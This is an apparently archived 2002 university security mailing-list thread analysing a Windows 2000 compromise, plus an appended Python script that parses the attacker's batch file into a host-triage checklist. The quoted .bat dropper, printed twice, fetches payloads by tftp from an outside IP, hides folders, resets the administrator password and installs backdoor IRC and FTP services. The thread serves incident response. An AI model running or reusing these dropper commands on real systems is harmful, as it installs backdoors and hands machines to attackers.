[unisog] Re: Coordinated Scan

Mark Newman mnx at utk.edu
Wed Apr 3 15:06:35 GMT 2002


Anyone found a conclusive writeup on this?

Mark Newman
University of Tennessee

On Monday 01 April 2002 09:48 am, Jeff Bollinger wrote:
> More on this attack.  Here is the actual .bat file used by the attacker
> which gives some great clues:
>
> ----
>
> @echo off
> c:
> cd c:\winnt\system32\vmn32
> mkdir \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
> attrib +s +r +h \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
> kill sxe*
> kill temp.exe
> del ..\2*.ocx
> del ..\32*.ocx
> del ..\temp2.exe
> PATH=%PATH%;c:\winnt\system32
> move firedaem.exe firedaemon.exe
> del c:\winnt\system32\vmn32.exe
> attrib *.* -r /s
> attrib +s +h +r c:\winnt\system32\vmn32
> attrib c:\winnt\system32\vmn32\asp +s +h
> attrib c:\winnt\system32\vmn32\aspc +s +h
> tftp -i 12.233.26.173 GET ir2.conf c:\winnt\system32\vmn32\asp\ir.conf
> tftp -i 12.233.26.173 GET xir.conf c:\winnt\system32\vmn32\aspc\ir.conf
> tftp -i 12.233.26.173 GET barm8.gif c:\winnt\system32\vmn32\barm8.gif
> attrib *.* -r /s
> net user administrator changem
> net share /delete ipc$
> SET MXHOME=c:\winnt\system32\vmn32
> SET MXBIN=c:\winnt\system32\vmn32
> c:\winnt\system32\vmn32\firedaemon -i Ms32dll "c:\winnt\system32\vmn32" "c:\winnt\system32\vmn32\lsass.exe" "c:\winnt\system32\vmn32\barm8.gif" Y 0 0 Y Y
> c:\winnt\system32\vmn32\firedaemon -i SVHOST "c:\winnt\system32\vmn32\asp" "c:\winnt\system32\vmn32\asp\SVHOST.EXE" "c:\winnt\system32\vmn32\asp\ir.conf" Y 0 0 Y Y
> c:\winnt\system32\vmn32\firedaemon -i MSVC5  "c:\winnt\system32\vmn32\aspc" "c:\winnt\system32\vmn32\aspc\SVHOST.EXE" "c:\winnt\system32\vmn32\aspc\ir.conf" Y 0 0 Y Y
> c:\winnt\system32\vmn32\services start Ms32dll
> c:\winnt\system32\vmn32\services start SVHOST
> c:\winnt\system32\vmn32\services start MSVC5
> echo REGEDIT4  1>>root.reg
> echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> root.reg
> echo "restrictanonymous"="1" >> root.reg
> echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> root.reg
> echo "NTLM"="2" >> root.reg
> regedit /S root.reg
> del root.reg
> services stop tlntsvr
> services delete tlntsvr
> services stop lmhosts
> services start lmhosts
> services start NtLmSsp
> services stop PSEXESVC
> services delete PSEXESVC
>
> Allen Chang wrote:
> > Apologies if I break the thread...
> >
> > Here's my analysis of the compromised computers. First of all, this is
> > not the Backdoor.darkIRC detected by antivirus programs. This backdoor is
> > not detected by the latest NAV patterns.
> >
> > I'm guessing that these computers were compromised through the
> > administrative share with no administrator password on Windows 2000.
> >
> > *A rogue lsass.exe (with a red u and a smaller green d icon) was
> > installed as a service using firedaemon.exe (or firedaem.exe). You can
> > check for it under Administrative Tools -> Services. The one on our hosts
> > was called ms32dll
> > *Several .tmp files and a rudl32.exe are dropped in the Startup folder
> > but the .tmp files don't seem to run.
> > *Serv-U FTP, IRC and telnet servers are run on various ports. The IRC
> > configurations (ir.conf) seem to indicate that they are set up as XDCC
> > file-serving bots.
> >
> > Judging from this, one should be able to remove the service with a
> > "firedaemon -u ms32dll". This seems to close all the opened ports but I am
> > unsure as to what other damage may have been done.
> >
> > On all the hosts, nmap found the following ports open:
> > Port       State       Service
> > 132/tcp    open        cisco-sys <--tlntsvr.exe (telnet)
> > 135/tcp    open        loc-srv <--svchost.exe
> > 139/tcp    open        netbios-ssn <--NetBIOS sharing (normal)
> > 445/tcp    open        microsoft-ds <-Windows sharing (kind of normal)
> > 1025/tcp   open        listen <--mstask.exe (normal)
> > 8888/tcp   open        sun-answerbook <-- sxe5.tmp (backdoor client)
> >
> > Running Vision 1.0 (www.foundstone.com) on the compromised computers
> > yielded these additional ports and programs bound to them:
> > 1029/tcp  <-- sxe5.tmp
> > 1031/tcp <-- sxe5.tmp
> > 43958/tcp <--c:\winnt\system32\vmn32\lsass.exe <-not to be confused with
> > the other lsass.exe from MS
> > 3112/tcp <-- c:\winnt\system32\vmn32\lsass.exe
> >
> > According to vmn\ServUStartUpLog.txt (Not confirmed)
> > 3112 <-- ftp
> >
> > Hidden? (Never seen by me)
> > 99/tcp <-- Backdoor command shell?
> >
> > (**Files Found**)
> > C:\Documents and Settings\All Users\Start Menu\Programs\Startup
> > rudl32.exe
> > sxe3.tmp
> > sxe4.tmp
> > sxe5.tmp
> >
> > Other files mentioned at
> > http://www.theorygroup.com/Archive/Unisog/2002/msg00334.html
> >
> > @llen
> > Network Security
> > Office of Residential Computing
> > UC Berkeley
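The .bat file quoted above is a compact record of the indicators Allen was hunting for by hand (hidden directories, FireDaemon-wrapped services, the tftp source, the changed administrator password, the deleted ipc$ share, the registry edits and the services the attacker stopped or deleted). The following Python is an added example, not code from the thread or from any of the posters: it parses a dropper of this shape and turns it into a host-triage list. The DROPPER string is copied from Jeff Bollinger's post (the wrapped firedaemon lines re-joined, and the kill/del/SET housekeeping lines omitted for brevity); the Indicators fields, the regular expressions and the checklist format are my own assumptions, not anything the attacker's tooling or FireDaemon defines.

```python
import re
from dataclasses import dataclass, field

# Copied from the .bat posted in the thread (firedaemon lines re-joined where the
# mail client wrapped them; kill/del/SET housekeeping lines omitted for brevity).
DROPPER = r"""@echo off
cd c:\winnt\system32\vmn32
mkdir \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
attrib +s +r +h \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
move firedaem.exe firedaemon.exe
attrib +s +h +r c:\winnt\system32\vmn32
attrib c:\winnt\system32\vmn32\asp +s +h
attrib c:\winnt\system32\vmn32\aspc +s +h
tftp -i 12.233.26.173 GET ir2.conf c:\winnt\system32\vmn32\asp\ir.conf
tftp -i 12.233.26.173 GET xir.conf c:\winnt\system32\vmn32\aspc\ir.conf
tftp -i 12.233.26.173 GET barm8.gif c:\winnt\system32\vmn32\barm8.gif
net user administrator changem
net share /delete ipc$
c:\winnt\system32\vmn32\firedaemon -i Ms32dll "c:\winnt\system32\vmn32" "c:\winnt\system32\vmn32\lsass.exe" "c:\winnt\system32\vmn32\barm8.gif" Y 0 0 Y Y
c:\winnt\system32\vmn32\firedaemon -i SVHOST "c:\winnt\system32\vmn32\asp" "c:\winnt\system32\vmn32\asp\SVHOST.EXE" "c:\winnt\system32\vmn32\asp\ir.conf" Y 0 0 Y Y
c:\winnt\system32\vmn32\firedaemon -i MSVC5  "c:\winnt\system32\vmn32\aspc" "c:\winnt\system32\vmn32\aspc\SVHOST.EXE" "c:\winnt\system32\vmn32\aspc\ir.conf" Y 0 0 Y Y
c:\winnt\system32\vmn32\services start Ms32dll
c:\winnt\system32\vmn32\services start SVHOST
c:\winnt\system32\vmn32\services start MSVC5
echo REGEDIT4  1>>root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> root.reg
echo "restrictanonymous"="1" >> root.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> root.reg
echo "NTLM"="2" >> root.reg
regedit /S root.reg
services stop tlntsvr
services delete tlntsvr
services stop lmhosts
services start lmhosts
services start NtLmSsp
services stop PSEXESVC
services delete PSEXESVC
"""

# Patterns are assumptions about how this family of droppers is written.
TFTP = re.compile(r'^tftp\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)\s+(\S+)', re.I)
FIREDAEMON = re.compile(r'firedaemon(?:\.exe)?\s+-i\s+(\S+)\s+"([^"]*)"\s+"([^"]*)"\s+"([^"]*)"', re.I)
NET_USER = re.compile(r'^net\s+user\s+(\S+)\s+(\S+)', re.I)
NET_SHARE_DEL = re.compile(r'^net\s+share\s+/delete\s+(\S+)', re.I)
REG_KEY = re.compile(r'^echo\s+\[([^\]]+)\]', re.I)
REG_VAL = re.compile(r'^echo\s+"([^"]+)"="([^"]*)"', re.I)
SERVICES = re.compile(r'(?:^|\\)services(?:\.exe)?\s+(stop|delete|start)\s+(\S+)', re.I)


@dataclass
class Indicators:
    tftp_servers: set = field(default_factory=set)
    downloads: list = field(default_factory=list)       # (remote name, local path)
    services: dict = field(default_factory=dict)        # service name -> (exe, parameters)
    hidden_paths: set = field(default_factory=set)      # paths given attrib +h
    registry: list = field(default_factory=list)        # (key, value name, data)
    account_changes: list = field(default_factory=list)  # (user, new password)
    deleted_shares: set = field(default_factory=set)
    removed_services: set = field(default_factory=set)  # stopped or deleted by the attacker


def extract(script: str) -> Indicators:
    """Walk the dropper line by line and collect host indicators."""
    ind = Indicators()
    key = None  # current [HKEY...] section of the .reg file being echoed
    for raw in script.splitlines():
        line = raw.strip()
        if m := TFTP.match(line):
            ind.tftp_servers.add(m[1])
            ind.downloads.append((m[2], m[3].lower()))
        elif m := FIREDAEMON.search(line):
            ind.services[m[1]] = (m[3].lower(), m[4].lower())
        elif m := NET_USER.match(line):
            ind.account_changes.append((m[1].lower(), m[2]))
        elif m := NET_SHARE_DEL.match(line):
            ind.deleted_shares.add(m[1].lower())
        elif m := REG_KEY.match(line):
            key = m[1].rstrip('\\')
        elif m := REG_VAL.match(line):
            ind.registry.append((key, m[1], m[2]))
        elif m := SERVICES.search(line):
            if m[1].lower() in ('stop', 'delete'):
                ind.removed_services.add(m[2].lower())
        elif line.lower().startswith('attrib ') and '+h' in line.lower().split():
            # first token that is not a +/- flag or a /switch is the path being hidden
            for tok in line.split()[1:]:
                if tok[0] not in '+-/':
                    ind.hidden_paths.add(tok.lower())
                    break
    return ind


def checklist(ind: Indicators) -> list:
    """Things to look for on a suspect host, one line each."""
    out = [f"service {n}: {exe} {args}" for n, (exe, args) in ind.services.items()]
    out += [f"hidden path: {p}" for p in sorted(ind.hidden_paths)]
    out += [f"tftp source: {s}" for s in sorted(ind.tftp_servers)]
    out += [f"registry {k}\\{v} = {d}" for k, v, d in ind.registry]
    out += [f"password changed: {u}" for u, _ in ind.account_changes]
    out += [f"service stopped/deleted: {s}" for s in sorted(ind.removed_services)]
    return out


if __name__ == "__main__":
    print("\n".join(checklist(extract(DROPPER))))
```

The output is a list to compare against the Services snap-in, `dir /a:h` of the hidden directories and the firewall logs (the tftp source address is the one network indicator the script gives away); it is a triage aid, not a cleaner, and says nothing about the sxe*.tmp and rudl32.exe files in the Startup folder, which this particular script does not touch.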


